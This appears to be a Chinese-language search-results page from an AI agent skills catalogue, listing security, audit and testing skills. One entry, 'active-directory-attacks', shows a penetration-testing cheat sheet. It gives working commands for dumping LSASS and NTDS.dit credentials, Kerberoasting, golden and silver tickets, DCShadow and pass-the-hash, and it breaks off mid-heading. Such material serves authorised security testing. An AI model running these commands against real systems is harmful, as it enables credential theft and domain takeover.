搜索结果
全部能力
找到 97 个相关结果 / 测试与 QA
安全与治理 / 审核评估
ln-634-test-coverage-auditor
ln-634-test-coverage-auditor
Identifies missing tests for unique critical local logic: money, auth, permissions, data integrity, algorithms, and domain rules. Use when auditing critical…
安全与治理 / 审核评估
sql-injection-testing
sql-injection-testing
Execute comprehensive SQL injection vulnerability assessments on web applications to identify database security flaws, demonstrate exploitation techniques, and…
安全与治理 / 审核评估
Active Directory 攻击
active-directory-attacks
Active Directory 渗透测试技术指南 ## 信息收集 ### 域基础信息 - `nltest /domain_trusts` - 查看域信任关系 - `net view /domain` - 枚举域列表 - `nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>` - 定位域控制器 ### BloodHound 资产发现 ```powershell # SharpHound 数据收集 Invoke-BloodHound -CollectionMethod All -Domain target.com -ZipFileName loot.zip ``` ### LDAP 查询 ```powershell # 查找域管账户 ([adsisearcher]"(&(objectCategory=person)(objectClass=user)(adminCount=1))").FindAll() # 查找非约束委派的服务账户 Get-ADObject -LDAPFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(samAccountType=805306368))" ``` ## 凭据获取 ### LSASS 内存提取 ```powershell # procdump + mimikatz 离线解析 procdump.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full ``` ### SAM/NTDS.dit 提取 ```powershell # Volume Shadow Copy 方式 vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\loot\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\loot\ # ntdsutil 官方工具 ntdsutil "ac i ntds" "ifm" "create full c:\loot" q q ``` ### Kerberoasting ```powershell # 请求 SPN 服务票据 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.target.com:1433" # Rubeus 自动化 Rubeus.exe kerberoast /outfile:hashes.txt ``` ## Kerberos 攻击 ### AS-REP Roasting ```powershell # 查找 "Do not require Kerberos preauthentication" 账户 Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth # Rubeus 攻击 Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt ``` ### Golden Ticket ```powershell # 需要 krbtgt 账户的 NTLM hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt mimikatz # kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt ``` ### Silver Ticket ```powershell # 针对特定服务,需要服务账户 NTLM hash mimikatz # kerberos::golden /user:fakeuser /domain:target.com /sid:S-1-5-21-... /target:sql01.target.com /service:MSSQLSvc /rc4:servicehash /ptt ``` ### DCShadow ```powershell # 需要域管权限,注册伪造 DC mimikatz # lsadump::dcshadow /object:targetuser /attribute:Description /value:"backdoor" ``` ## 横向移动 ### Pass-the-Hash ```powershell # mimikatz sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:powershell.exe # Invoke-WMIExec Invoke-WMIExec -Target dc01.target.com -Username admin -Hash hash -Command "powershell -enc ..." ``` ### Over-Pass-the-Hash ```powershell # 获取 TGT 后使用正常 Kerberos 认证 Rubeus.exe asktgt /user:admin /rc4:hash /ptt ``` ### Pass-the-Ticket ```powershell # 导出票据后注入 mimikatz # sekurlsa::tickets /export mimikatz # kerberos::ptt [0;123456]-0-0-40810000-admin@krbtgt-target.com.kirbi ``` ### 约束委派滥用 ```powershell # 配置 S4U2Self + S4U2Proxy Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.target.com /ptt ``` ### 基于资源的约束委派 (RBCD
安全与治理 / 审核评估
阿里云安全-KMS测试
alicloud-security-kms-test
KMS 技能的最小化冒烟测试。验证认证和只读密钥列表路径。
安全与治理 / 审核评估
alicloud-ai-misc-crawl-and-skill-test
alicloud-ai-misc-crawl-and-skill-test
最小化验证爬取与技能工作流的就绪状态。
安全与治理 / 审核评估
阿里云可观测性-SLS日志查询测试
alicloud-observability-sls-log-query-test
SLS 日志查询技能的极简冒烟测试。验证 SDK 认证和单次有界查询。
安全与治理 / 审核评估
alicloud-network-dns-cli-test
alicloud-network-dns-cli-test
阿里云 DNS CLI 技能的最小化冒烟测试。验证 aliyun-cli 认证和 describe-subdomain 流程。
安全与治理 / 审核评估
security-scanning-security-dependencies
security-scanning-security-dependencies
You are a security expert specializing in dependency vulnerability analysis, SBOM generation, and supply chain security. Scan project dependencies across…
安全与治理 / 审核评估
agent-skills-creator
agent-skills-creator
指导创建遵循开放格式规范的最佳实践智能体技能。涵盖前置元数据、目录结构、渐进式披露、…
安全与治理 / 审核评估
connecting-to-data-source
connecting-to-data-source
>-
安全与治理 / 审核评估
nielsen-heuristics-audit
nielsen-heuristics-audit
Evaluate UX/UI using Jakob Nielsen's 10 usability heuristics. Comprehensive audit of visibility, control, consistency, error prevention, recognition,…
安全与治理 / 审核评估
playwright-in-sandbox
playwright-in-sandbox
Primary Playwright governance skill for sandbox browser verification and deterministic end-to-end authoring or rewrite work.
安全与治理 / 审核评估
deploying-contracts-on-base
deploying-contracts-on-base
Deploys smart contracts to Base using Foundry. Covers forge create commands, contract verification, testnet faucet setup via CDP, and BaseScan API key…
安全与治理 / 审核评估
ssh-penetration-testing
ssh-penetration-testing
Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and…
安全与治理 / 审核评估
axiom-ios-accessibility
axiom-ios-accessibility
Use when fixing or auditing ANY accessibility issue - VoiceOver, Dynamic Type, color contrast, touch targets, WCAG compliance, App Store accessibility review.
安全与治理 / 审核评估
owasp-llm-top10
owasp-llm-top10
Security audit for LLM and GenAI applications using OWASP Top 10 for LLM Apps 2025. Assess prompt injection, data leakage, supply chain, and 7 more critical…
安全与治理 / 审核评估
pentest-expert
pentest-expert
Penetration testing methodology expert. OWASP, PTES, reconnaissance, scanning, exploitation, reporting. Use for security assessments.
安全与治理 / 审核评估
supabase-audit-auth-config
supabase-audit-auth-config
Analyze Supabase authentication configuration for security weaknesses and misconfigurations.
安全与治理 / 审核评估
doc-coauthoring
doc-coauthoring
Guide users through a structured workflow for co-authoring documentation. Use when user wants to write documentation, proposals, technical specs, decision…
安全与治理 / 审核评估
metasploit-framework
metasploit-framework
⚠️ AUTHORIZED USE ONLY > This skill is for educational purposes or authorized security assessments only. > You must have explicit, written permission from the…